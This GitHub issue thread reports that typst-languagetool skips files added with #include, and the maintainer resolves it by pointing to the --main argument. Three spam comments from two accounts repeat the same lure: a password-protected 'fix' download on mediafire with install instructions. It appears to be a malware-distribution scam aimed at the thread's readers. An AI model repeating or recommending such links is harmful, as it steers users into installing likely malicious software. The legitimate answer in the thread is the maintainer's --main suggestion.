### ISSUE TITLE
Files with #include are not included in typst-languagetool check (v0.1.0)

### ISSUE THREAD

**Issue by 1dancook** [antonWetzel/typst-languagetool#27]
The title summarizes it, but the below expands: b.typ contains errors but it is not evaluated. (Evaluating it on it's own does work).

#### 1. Create two files:

File: **a.typ**

```typst
haves problims.

#include ("b.typ")
```

File: **b.typ**

```typst
has a speeeling mistacke
```

#### 2. Run:

`typst-languagetool check --host=http://localhost --port=8081 -p a.typ`

Output:

```
Checking Document



Checking Document

info[UPPERCASE_SENTENCE_START]: Checks that a sentence starts with an uppercase letter
 --> a.typ:1:1
  |
1 | haves problims.
  | ----- info: This sentence does not start with an uppercase letter.
  |      - help: Haves
  |
info[MORFOLOGIK_RULE_EN_GB]: Possible spelling mistake
 --> a.typ:1:7
  |
1 | haves problims.
  |       -------- info: Possible spelling mistake found.
  |               - help: problems
  |
```

### Impact and importance

This is particularly impactful for a document structure that is broadly defined in one file. The actual content will not be evaluated. I.e. 

main.typ

```typst
#import(...)
#include("section1.typ")
#include("section2.typ")
#include("section3.typ")
#include("section4.typ")
#bibliography(...)
```

**Comment by 1dancook** [comment]
I now see this is in #21 but the issue is closed.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by antonWetzel** [comment]
If you want to check all files in a project, use the `--main=<...>` argument instead of path.

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 1dancook** [comment]
Aye, indeed that works. My apologies for not trying it.

I think the wording in the readme and the cli tool led me to believe that `--main` will just use `--path`:

```
Different main file can be used
- defaults to path
- --main=<file>
```

Perhaps: "To check a main project file that has included sub-files, use --main=<file>" or similar.

I will close this.
